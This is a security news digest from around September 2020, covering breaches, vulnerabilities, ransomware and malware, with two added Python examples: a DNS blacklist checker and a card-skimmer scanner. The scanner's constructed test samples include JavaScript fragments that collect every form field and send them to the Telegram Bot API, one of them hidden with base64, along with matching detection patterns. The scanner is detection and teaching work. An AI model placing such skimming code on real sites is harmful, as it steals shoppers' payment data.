Table of Contents

  1. Politics
    1. Russian agency created fake leftwing news outlet with fictional editors, Facebook says
    2. CISA and FBI say they have not seen cyber-attacks this year on voter registration databases
    3. Pakistan blocks 'immoral' Tinder, Grindr and other apps
    4. Facebook to block news on Australian sites after new law, riling lawmakers
  2. Breaches
    1. Mansfield City Schools: No personal data compromised during cyber attack
    2. Experian (South Africa) - 1,284,637 breached accounts
    3. Hackers breached Norwegian Parliament emails to steal data
    4. Twitter Hack May Have Had Another Mastermind: A 16-Year-Old
    5. American Payroll Association discloses credit card theft incident
    6. PULAU Corporation notifies employees of June hack
    7. AusCERT says alleged DoE hack came from a third-party
  3. Misc
    1. CEOs could soon be personally liable for cyberattacks
    2. CipherTrace Provided Feds with "Monero Tracing" Tools
    3. Google now pays for bugs used to bypass its anti-fraud systems
    4. Over 400 GOV.UK domains found on spam blacklists
    5. Tor launches membership program to secure finance, boost integration
  4. Vulnerabilities
    1. 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin
    2. JITSploitation
    3. Cisco warns of actively exploited bugs in carrier-grade routers
    4. wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
  5. Crime
    1. Iranian hackers are selling access to corporate networks
    2. Average BEC attempts are now $80k, but one group is aiming for $1.27m per attack
  6. Ransomware
    1. Amphastar Pharmaceuticals discovers that threat actors had exfiltrated employee data in May ransomware attack
    2. Rocky Mount hit by ransomware, investigating and trying to recover
  7. Malware
    1. Credit card data smuggled via private Telegram channel
    2. Apple Accidentally Approved Malware to Run on macOS
    3. Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers
    4. COVID-19 Phishing Scheme Spreads AgentTesla Trojan
    5. Hackers are backdooring QNAP NAS devices with 3-year old RCE bug
    6. New KryptoCibule Windows malware is a triple threat for cryptocurrency users
  8. Privacy
    1. Police across Canada are using predictive policing algorithms, report finds

Politics

Russian agency created fake leftwing news outlet with fictional editors, Facebook says

The Russian agency that interfered in the 2016 US election created a fake leftwing news publication, staffed it with fake editors with AI-generated photos and hired real freelance reporters as part of a fresh influence operation detected and removed by Facebook, the company said on Tuesday. The latest operation by the Internet Research Agency (IRA) was still in its early stages when it was detected thanks to a tip from the FBI, according to Facebook's head of security policy, Nathaniel Gleicher. The network had 13 accounts and two pages, with about 14,000 total followers. The Facebook accounts and pages were designed to bolster PeaceData.net, an English- and Arabic-language website that claims to be a "global news organization", but whose editorial staff are fictitious. Headshots of PeaceData's "staff" were created using Generative Adversarial Networks, a type of AI that can produce lifelike images of faces, according to Graphika, a social media analysis firm that produced a report on the IRA operation.

CISA and FBI say they have not seen cyber-attacks this year on voter registration databases

The Cybersecurity and Infrastructure Security Agency and the Federal Bureau of Investigation said that they have not seen any cyber-attacks target US voter registration databases and voting systems this year. The article that prompted the statement, published by Russian news agency Kommersant, claimed that a Russian hacker had obtained voter records for more than 7.6 million Michigan voters following an intrusion into the state's database earlier this year, in March. According to Kommersant, the hacker also claimed to be in possession of voter records for Connecticut, Arkansas, Florida, and North Carolina voters, but in smaller numbers, and had been making all the databases available for free on a hacking forum since July.

Pakistan blocks 'immoral' Tinder, Grindr and other apps

Pakistan's government has blocked Tinder, Grindr and three other dating apps, its latest move to curb online platforms deemed to be disseminating "immoral content". In Pakistan extramarital relationships and homosexuality are illegal. The Pakistan Telecommunications Authority said it has sent notices to the management of the five apps, "keeping in view the negative effects of immoral/indecent content streaming". PTA said the notices issued to Tinder, Grindr, Tagged, Skout and SayHi sought the removal of "dating services" and moderation of live streaming content in accordance with local laws.

Facebook to block news on Australian sites after new law, riling lawmakers

Facebook on Tuesday said it would stop Australians sharing news content on its platforms if a proposal to make it pay local media outlets for their content becomes law, escalating tension with the Australian government. The world's largest social network also updated its "terms of use" on Tuesday to say that it can block content anywhere globally or restrict users from accessing the services if such a move is warranted to avoid regulatory risks. "This global update provides more flexibility for us to change our services, including in Australia, to continue to operate and support our users in response to potential regulation or legal action," a company spokesperson said.

Breaches

Mansfield City Schools: No personal data compromised during cyber attack

No "personal information" was accessed during a recent cyber attack on Mansfield City Schools, according to superintendent Stan Jefferson. Jefferson sent a letter to staff and district families Tuesday morning addressing the incident. "We want to assure you that we successfully contained the threat and at no time was any of the personal information of our students, families or staff compromised," Jefferson wrote.

Experian (South Africa) - 1,284,637 breached accounts

In August 2020, Experian South Africa suffered a data breach which exposed the personal information of tens of millions of individuals. Only 1.3M of the records contained email addresses, whilst most contained government-issued identity numbers, names, addresses, occupations and employers, amongst other personal information.

Hackers breached Norwegian Parliament emails to steal data

Attackers have compromised a limited number of email accounts of Norwegian Parliament (Storting) representatives and employees according to Storting's managing director Marianne Andreassen. After gaining access to the email inboxes, the hackers stole unspecified amounts of data from each of the hacked email accounts according to a statement published on the parliament's site. At the moment, the investigators haven't yet discovered what kind of data was exfiltrated by the attackers from the compromised Storting email accounts. The Parliament is closely working with relevant security authorities to investigate the attack and Andreassen said that the incident was reported by Storting's administration to the Norwegian Police Security Service (PST). "PST is aware of the IT attack on the Storting," a tweet from PST's official Twitter account reads. "Once PST has received the report, we will assess whether there is a basis for starting an investigation."

Twitter Hack May Have Had Another Mastermind: A 16-Year-Old

When authorities arrested Graham Ivan Clark, who they said was the "mastermind" of the recent Twitter hack that ensnared Kanye West, Bill Gates and others, one detail that stood out was his age: He was only 17. Now authorities have homed in on another person who appears to have played an equal, if not more significant role, in the July 15 attack, New York Times reported Tuesday, citing four people involved in the investigation who declined to be identified because the inquiry was ongoing. They said the person was at least partly responsible for planning the breach and carrying out some of its most sensitive and complicated elements. The search warrant and other documents in the case are under seal and federal agents may decide not to charge the youth with a crime. If he is ultimately arrested, the case is likely to be handed over to Massachusetts authorities, who have more leverage than federal prosecutors in charging minors as adults.

American Payroll Association discloses credit card theft incident

The American Payroll Association (APA) disclosed a data breach affecting members and customers after attackers successfully planted a web skimmer on the organization's website login and online store checkout pages. APA discovered around July 23, 2020, that its website and online store were breached by unknown threat actors who deployed a skimmer designed to collect and exfiltrate sensitive information to attacker-controlled servers. The attackers used a security vulnerability in the organization's content management system (CMS) to hack into APA's site and online store according to a data breach notification sent to affected individuals by Robert Wagner, APA's Senior Director of Govt. and Public Relations, Certification, and IT.

PULAU Corporation notifies employees of June hack

Defense supplier PULAU Corporation is notifying their employees about an intrusion and unauthorized access into parts of their network between June 11 and June 29. Based on their investigation, they believe the unauthorized party acquired certain employment-related records stored on the affected systems. The affected records contained certain personal information, such as name, contact information, date of birth, government-issued ID (such as Social Security, passport, military ID, tax ID and/or driver's license numbers), financial account information (such as bank account and/or payment card information), online account usernames and passwords, and/or health-related information (including health insurance information). Importantly, not all of this information was affected for each impacted individual.

AusCERT says alleged DoE hack came from a third-party

The Australian Computer Emergency Response Team (AusCERT) denied claims that hackers had breached the Department of Education, Skills, and Employment (DoE), and downloaded the personal details of more than one million students, teachers, and staff. Rumors of a supposed hack first surfaced after a hacker shared an archive file on a hacker forum, which they initially advertised as data obtained from the Australian DoE. According to a screenshot of a now-deleted forum post, the hacker claimed the data contained more than one million records for Australian students, teachers, and DoE staff, that they obtained back in 2019.

Misc

CEOs could soon be personally liable for cyberattacks

Within four years, the majority of CEOs will be held personally responsible for cyberattacks that lead to injury and other physical damage. This is according to a new report from Gartner, which asserts that liability for cyber-physical security incidents will "pierce the corporate veil to personal liability" for 75 percent of CEOs by 2024. Cyber-physical systems (CPS) are described as digital systems that interact with the physical world, such as IoT devices or operational technologies (OT). "Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them," said Katell Thielemann, Research Vice President at Gartner.

CipherTrace Provided Feds with "Monero Tracing" Tools

CipherTrace, a self-described "Blockchain Forensics Team," reportedly created "Monero tracing" tools for the U.S. Department of Homeland Security. CipherTrace's contract with DHS Science & Technology Directorate resulted in the development of forensic tools for law enforcement and government agencies to trace and visualize Monero transaction flows for criminal investigations. CipherTrace developed tools to explore Monero transactions to assist in investigations. These tools include transaction search, exploration, and visualization tools for Monero transaction flows that have been integrated with CipherTrace's Inspector financial investigations product. This provides ways to track stolen Monero currencies or Monero currencies used in illegal transactions. It also helps assure cryptocurrency exchanges, OTC trading desks, investment funds and custody providers that they do not accept Monero from illicit sources and investigate Monero received from potentially illicit sources and take appropriate actions to stay in compliance.

Google now pays for bugs used to bypass its anti-fraud systems

Google announced that the company's Vulnerability Reward Program has expanded to also include bug reports on methods threat actors can use to bypass the company's abuse, fraud, and spam systems. "A few examples of potentially valid reports for this program could include bypassing our account recovery systems at scale, identifying services vulnerable to brute force attacks, circumventing restrictions on content use and sharing, or purchasing items from Google without paying," Google's Eric Brown and Marc Henson said.

Over 400 GOV.UK domains found on spam blacklists

Hundreds of domains managed by the U.K. government are on DNS-based blacklists creating email communication problems. Multiple government agencies, councils, and public welfare agencies rely on GOV.UK domain infrastructure to provide online services to Britain's residents. Being on an automated IP blacklist usually signifies a problem with your mail infrastructure: most likely either your server has been sending spam, or was compromised at some point.
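How a DNS-based blacklist lookup actually works is the check an operator would run on their own outbound mail server's IP after a story like this. The example below is added here and is not code from the article or from any blacklist operator: it reverses the IPv4 octets, appends the list's zone, and interprets the answer the way real lists expect (an address in 127.0.0.0/8 means listed, NXDOMAIN means clean, anything else means the zone is misbehaving or parked and its answer should be ignored). The zone names and the DNS answers are constructed so the example runs offline; a small `real_resolver` shows how to plug in the system resolver instead.

```python
import ipaddress
import socket
from typing import Callable, Dict, List, Optional

LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")

# Constructed stand-in for DNS so the example runs offline. Keys are the DNSBL
# query names a client would ask for; values are the A record a list answers
# with. The zone names are hypothetical, not real blacklists.
FAKE_DNS: Dict[str, str] = {
    "10.2.0.192.bl.example.org": "127.0.0.2",        # 192.0.2.10 is listed here
    "10.2.0.192.bl-two.example.org": "127.0.0.10",   # ...and here, with another code
    "5.113.0.203.parked.example.org": "198.51.100.7",  # a zone answering outside 127/8
}


def fake_resolver(name: str) -> Optional[str]:
    """Return the constructed A record for name, or None to mimic NXDOMAIN."""
    return FAKE_DNS.get(name)


def real_resolver(name: str) -> Optional[str]:
    """Query the system resolver; NXDOMAIN surfaces as socket.gaierror."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL query name: IPv4 octets reversed, then the zone appended."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(ip.split("."))) + "." + zone


def lookup(ip: str, zones: List[str],
           resolve: Callable[[str], Optional[str]] = fake_resolver) -> Dict[str, str]:
    """Check one IP against each zone and classify every answer."""
    report: Dict[str, str] = {}
    for zone in zones:
        answer = resolve(dnsbl_query_name(ip, zone))
        if answer is None:
            report[zone] = "clean"
        elif ipaddress.ip_address(answer) in LOOPBACK_NET:
            # The low octet is the list's own reason code (varies per list).
            report[zone] = f"listed ({answer})"
        else:
            # Non-loopback answers usually mean a wildcarded or parked zone;
            # treating them as listings would produce false positives.
            report[zone] = f"invalid answer {answer}; ignore this zone"
    return report


def is_listed(ip: str, zones: List[str],
              resolve: Callable[[str], Optional[str]] = fake_resolver) -> bool:
    """True if any zone gives a valid listing answer for ip."""
    return any(v.startswith("listed") for v in lookup(ip, zones, resolve).values())


if __name__ == "__main__":
    zones = ["bl.example.org", "bl-two.example.org", "parked.example.org"]
    for ip in ("192.0.2.10", "203.0.113.5"):
        print(ip, lookup(ip, zones))
```

To check a real server, pass `resolve=real_resolver` and the zones of the lists you care about; the invalid-answer branch is worth keeping, because a zone that has been abandoned and wildcarded will otherwise report every address on the internet as listed.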

Tor launches membership program to secure finance, boost integration

The Tor Project has launched the Tor Project Membership Program to secure the network's future by diversifying funding and deepening partnerships with other software providers. The non-profit's new scheme brings together Avast, DuckDuckGo, Insurgo, Mullvad VPN, and Team Cymru as founding members. The companies are all involved in the security and privacy realm and will help secure diverse funding sources.

Vulnerabilities

700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin

Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in File Manager, a WordPress plugin with over 700,000 active installations. This vulnerability allowed unauthenticated users to execute commands and upload malicious files on a target site. A patch was released on September 1, 2020. Researchers are seeing this vulnerability being actively exploited in the wild, therefore, they urge users to update to the latest version, 6.9, immediately since it contains a patch for this vulnerability and will keep you protected.

JITSploitation

This three-part series from Google Project Zero highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

Cisco warns of actively exploited bugs in carrier-grade routers

Cisco warned over the weekend that threat actors are trying to exploit two high severity memory exhaustion denial-of-service (DoS) vulnerabilities in the company's Cisco IOS XR software that runs on carrier-grade routers. Cisco's IOS XR Network OS is deployed on multiple router platforms including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers. Cisco hasn't yet released software updates to address these actively exploited zero-days (tracked as CVE-2020-3566 and CVE-2020-3569), but the company provides mitigation in a security advisory published over the weekend. "On August 28, 2020, the Cisco Product Security Incident Response Team (PSIRT) became aware of attempted exploitation of these vulnerabilities in the wild," Cisco explains.

wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)

wolfSSL is a C-language-based SSL/TLS library targeted at IoT, embedded, and RTOS environments. wolfSSL incorrectly implements the TLS 1.3 client state machine. This allows attackers in a privileged network position to completely impersonate any TLS 1.3 servers and read or modify potentially sensitive information between clients using the wolfSSL library and these TLS servers.

Crime

Iranian hackers are selling access to corporate networks

An Iranian-backed hacker group has been observed seeking to sell access to compromised corporate networks to other threat actors on underground forums and attempting to exploit F5 BIG-IP devices vulnerable to CVE-2020-5902. The Iranian hackers have been active since at least 2017 and are being tracked as Pioneer Kitten by cyber-security firm CrowdStrike, as Fox Kitten by threat intelligence firm ClearSky, and as Parisite by ICS security firm Dragos. "This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government," CrowdStrike says in a report.

Average BEC attempts are now $80k, but one group is aiming for $1.27m per attack

The average sum that a BEC group will try to steal from a targeted company is now around $80,000 per attack, according to an industry report published on Monday. But according to Agari, a cyber-security firm that's a member of the APWG, in Q2 2020 the BEC threat landscape saw yet another major gang that likes to go after big payouts, namely a newly discovered Russia-based BEC group named Cosmic Lynx. Per a report earlier this year, Agari says this group has been active since July 2019, and has targeted 46 entities across six continents in more than 200 distinct campaigns. The group is unique not only because it operates from Russia (outside West Africa, where most BEC gangs are located) but also because of the level and scale at which it operates. "The average amount requested by Cosmic Lynx in its attacks is an astounding $1.27 million," Agari said in the APWG report.

Ransomware

Amphastar Pharmaceuticals discovers that threat actors had exfiltrated employee data in May ransomware attack

On July 21, the DoppelPaymer ransomware threat actors added Amphastar Pharmaceuticals to their leak list. They also uploaded a number of files as proof of access and exfiltration. It was because of that listing that Amphastar eventually discovered that employee data had been stolen in a May attack. On August 27, Amphastar sent notification letters to current and former employees whose information was impacted by the attack.

Rocky Mount hit by ransomware, investigating and trying to recover

Add Rocky Mount, North Carolina to the list of governments hit by ransomware. As of Aug. 28, they didn't seem to yet know too much, as WITN reported: Rocky Mount leaders are trying to get the city's network back on track after facing a cyber attack. The city is in the process of confirming what impact the attack may have had on information on the network. Leaders say they know Rocky Mount was the victim of a cyber attack that involved the encryption of certain city systems, and say the investigation will determine if personal information was stolen.

Malware

Credit card data smuggled via private Telegram channel

Security researchers noticed that some cybercriminals attacking online stores are using private Telegram channels to steal credit card information from customers making a purchase on victim sites. The find is the first public documentation of this trick that makes data extraction more efficient and the entire card skimming operation easier to manage. The new method was discovered by Affable Kraut using data from Sansec, a company specialized in fighting digital skimming. The researcher analyzed the malicious JavaScript, which includes common anti-analysis protections. In a thread on Twitter, Kraut explains how the script works, noting that it collects data from any type of input field and sends it to a Telegram channel.
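The two behaviours described above, harvesting every input field and shipping the result to the Telegram Bot API, are what a reviewer of a store's front-end JavaScript would look for. The scanner below is an added example and is not the researcher's analysis, Sansec's tooling or the real skimmer: it runs over three constructed script snippets (a benign analytics call, a plain skimmer-like snippet, and one that hides the Telegram URL behind `atob`), decodes base64 literals so the obfuscated case is caught too, and flags a script only when form harvesting and the Telegram endpoint appear together.

```python
import base64
import re
from typing import Dict, List

TELEGRAM_BOT_API = "https://api.telegram.org/bot"

# Constructed sample scripts for the scanner to run over. None of these is the
# real skimmer; they only reproduce the two indicators named in the article.
SAMPLES: Dict[str, str] = {
    "analytics.js": (
        "fetch('https://metrics.example.net/collect',"
        "{method:'POST',body:JSON.stringify({page:location.pathname})});"
    ),
    "checkout-helper.js": (
        "var d={};document.querySelectorAll('input,select,textarea')"
        ".forEach(function(e){d[e.name]=e.value});"
        "new Image().src='https://api.telegram.org/bot'+t+'/sendMessage?chat_id='+c"
        "+'&text='+encodeURIComponent(JSON.stringify(d));"
    ),
    "obf.js": (
        "var u=atob('" + base64.b64encode(TELEGRAM_BOT_API.encode()).decode() + "');"
        "var f=new FormData(document.forms[0]);"
        "navigator.sendBeacon(u+k+'/sendMessage',f);"
    ),
}

# Ways a script can sweep up every field on a checkout page.
HARVEST_PATTERNS = [
    r"querySelectorAll\(\s*['\"][^'\"]*input",
    r"new FormData\(",
    r"document\.forms",
    r"getElementsByTagName\(\s*['\"]input['\"]",
]

# atob('...') with a base64 literal argument, the simplest string hiding trick.
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decoded_literals(script: str) -> List[str]:
    """Decode every base64 literal passed to atob() so hidden URLs are visible."""
    out: List[str] = []
    for b64 in ATOB_RE.findall(script):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def analyse(script: str) -> List[str]:
    """Return the list of indicators found in one script (empty if none)."""
    findings: List[str] = []
    if any(re.search(p, script) for p in HARVEST_PATTERNS):
        findings.append("harvests form inputs")
    visible = script + "\n" + "\n".join(decoded_literals(script))
    if TELEGRAM_BOT_API in visible:
        findings.append("contacts Telegram Bot API")
    if "atob(" in script:
        findings.append("decodes base64 literals")
    return findings


def is_skimmer_like(script: str) -> bool:
    """Flag only when harvesting and the Telegram exfil channel occur together."""
    found = analyse(script)
    return "harvests form inputs" in found and "contacts Telegram Bot API" in found


def scan(samples: Dict[str, str]) -> Dict[str, List[str]]:
    """Run analyse() over a name -> script mapping."""
    return {name: analyse(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        verdict = "SKIMMER-LIKE" if is_skimmer_like(SAMPLES[name]) else "ok"
        print(f"{name:20s} {verdict:13s} {findings}")
```

Requiring both indicators keeps a legitimate Telegram-notification widget or an ordinary form-validation library from being flagged on its own; in a real deployment the pattern list would be the part to extend, and a `connect-src` / `img-src` Content-Security-Policy that does not include `api.telegram.org` is the complementary control that blocks the exfiltration even when the scan misses it.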

Apple Accidentally Approved Malware to Run on macOS

In an attempt to crack down on growing threats like adware and ransomware, in February Apple began "notarizing" all macOS applications, a vetting process designed to weed out illegitimate or malicious apps. Even software distributed outside of the Mac App Store now needs notarization, or users wouldn't be able to run it without special workarounds. Seven months later, though, researchers have found an active adware campaign attacking Mac users with the same old payloads, and the malware has been fully notarized by Apple. The campaign is distributing the ubiquitous "Shlayer" adware, which by some counts has affected as many as one in 10 macOS devices in recent years. The malware exhibits standard adware behavior, like injecting ads into search results. It's not clear how Shlayer slipped past Apple's automated scans and checks to get notarized, especially given that it's virtually identical to past versions. But it's the first known example of malware being notarized for macOS.

Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers

The Palo Alto Networks squatting detector system discovered that 13,857 squatting domains were registered in December 2019, an average of 450 per day. They found that 2,595 (18.59%) squatted domain names are malicious, often distributing malware or conducting phishing attacks, and 5,104 (36.57%) squatting domains they studied present a high risk to users visiting them, meaning they have evidence of association with malicious URLs within the domain or are utilizing bulletproof hosting.

COVID-19 Phishing Scheme Spreads AgentTesla Trojan

A global phishing campaign that purports to offer information about surgical masks and other personal protective equipment for use during the COVID-19 pandemic is infecting victims' devices with the AgentTesla remote access Trojan, according to researchers at Area 1 Security. The campaign, which appears to have started in May, uses phishing emails that spoof messages from chemical manufacturers as well as import/export businesses, preying on fears of shortages of face masks and forehead thermometers during the pandemic, according to the report.

Hackers are backdooring QNAP NAS devices with 3-year old RCE bug

Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release. According to a report published by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), unknown threat actors are currently exploiting a remote command execution vulnerability due to a command injection weakness in QNAP NAS devices' firmware.

New KryptoCibule Windows malware is a triple threat for cryptocurrency users

Cyber-security firm ESET has published a report detailing a new strain of Windows malware that the company has named KryptoCibule. ESET says the malware has been distributed since at least December 2018, but only now surfaced on its radar. According to the company, KryptoCibule is aimed at cryptocurrency users, with the malware's main three features being to (1) install a cryptocurrency miner on victims' systems, (2) steal cryptocurrency wallet-related files, and (3) replace wallet addresses in the operating system's clipboard to hijack cryptocurrency payments.

Privacy

Police across Canada are using predictive policing algorithms, report finds

Police across Canada are increasingly using controversial algorithms to predict where crimes could occur, who might go missing, and to help them determine where they should patrol, despite fundamental human rights concerns, a new report has found. To Surveil and Predict: A Human Rights Analysis of Algorithmic Policing in Canada is the result of a joint investigation by the University of Toronto's International Human Rights Program (IHRP) and Citizen Lab. It details how, in the words of the report's authors, "law enforcement agencies across Canada have started to use, procure, develop, or test a variety of algorithmic policing methods," with potentially dire consequences for civil liberties, privacy and other Charter rights, the authors warn.